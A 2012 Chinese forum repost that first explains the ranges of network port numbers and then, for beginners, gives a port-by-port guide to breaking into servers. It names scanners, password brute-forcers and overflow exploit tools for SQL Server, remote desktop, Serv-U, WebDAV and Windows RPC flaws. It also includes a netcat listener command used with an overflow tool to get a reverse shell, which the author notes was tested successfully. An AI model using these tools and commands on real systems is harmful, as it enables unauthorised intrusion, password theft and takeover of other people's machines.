端口——轉(zhuǎn)自別處

昵稱9698701 2012-04-10

展開全文

望對(duì)新手入侵有幫助!

　　計(jì)算機(jī)"端口"是英文port的義譯，可以認(rèn)為是計(jì)算機(jī)與外界通訊交流的出口。其中硬件領(lǐng)域的端口又稱接口，如：USB端口、串行端口等。軟件領(lǐng)域的端口一般指網(wǎng)絡(luò)中面向連接服務(wù)和無(wú)連接服務(wù)的通信協(xié)議端口，是一種抽象的軟件結(jié)構(gòu)，包括一些數(shù)據(jù)結(jié)構(gòu)和I/O（基本輸入輸出）緩沖區(qū)。

　　按端口號(hào)可分為3大類：

　　（1）公認(rèn)端口（WellKnownPorts）：從0到1023，它們緊密綁定（binding）于一些服務(wù)。通常這些端口的通訊明確表明了某種服務(wù)的協(xié)議。例如：80端口實(shí)際上總是HTTP通訊。

　　（2）注冊(cè)端口（RegisteredPorts）：從1024到49151。它們松散地綁定于一些服務(wù)。也就是說有許多服務(wù)綁定于這些端口，這些端口同樣用于許多其它目的。例如：許多系統(tǒng)處理動(dòng)態(tài)端口從1024左右開始。

　?。?）動(dòng)態(tài)和/或私有端口（Dynamicand/orPrivatePorts）：從49152到65535。理論上，不應(yīng)為服務(wù)分配這些端口。實(shí)際上，機(jī)器通常從1024起分配動(dòng)態(tài)端口。但也有例外：SUN的RPC端口從32768開始。

　　1. 1433端口入侵

　　scanport.exe 查有1433的機(jī)器

　　SQLScanPass.exe 進(jìn)行字典暴破(字典是關(guān)鍵)

　　最后 SQLTools.exe入侵對(duì)sql的sp2及以下的系統(tǒng)，可用sql的hello 溢出漏洞入侵。

　　nc -vv -l -p 本機(jī)端口 sqlhelloF.exe 入侵ip 1433 本機(jī)ip 本機(jī)端口

　　(以上反向的，測(cè)試成功)

　　sqlhelloz.exe 入侵ip 1433 (這個(gè)是正向連接)

　　2. 4899端口入侵

　　用4899過濾器.exe，掃描空口令的機(jī)器

　　3. 3899的入侵

　　對(duì)很早的機(jī)器，可以試試3389的溢出(win3389ex.exe)

　　對(duì)2000的機(jī)器，可以試試字典暴破。(tscrack.exe)

　　4. 80入侵

　　對(duì)sp3以前的機(jī)器，可以用webdav入侵;

　　對(duì)bbs論壇，可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)

　　可以利用SQL進(jìn)行注入。(啊D的注入軟件)。

　　5. serv-u入侵(21端口)

　　對(duì)5. 004及以下系統(tǒng)，可用溢出入侵。(serv5004.exe)

　　對(duì)5.1.0.0及以下系統(tǒng)，可用本地提升權(quán)限。(servlocal.exe)

　　對(duì)serv-u的MD5加密密碼，可以用字典暴破。(crack.vbs)

　　輸入一個(gè)被serv-u加密的密碼(34位長(zhǎng))，通過與字典檔(dict.txt)的比較，得到密碼

　　6. 554端口

　　用real554.exe入侵。

　　7. 6129端口

　　用DameWare6129.exe入侵。

　　8. 系統(tǒng)漏洞

　　利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，進(jìn)行溢出入侵。

　　9. 3127等端口

　　可以利用doom病毒開的端口，用nodoom.exe入侵。(可用mydoomscan.exe查)。

　　10. 其他入侵

　　利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。

本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間，所有內(nèi)容均由用戶發(fā)布，不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購(gòu)買等信息，謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請(qǐng)點(diǎn)擊一鍵舉報(bào)。

轉(zhuǎn)藏 分享

QQ空間 QQ好友新浪微博微信

獻(xiàn)花（0） +1

來(lái)自：昵稱9698701 > 《系統(tǒng)端口》

舉報(bào)/認(rèn)領(lǐng)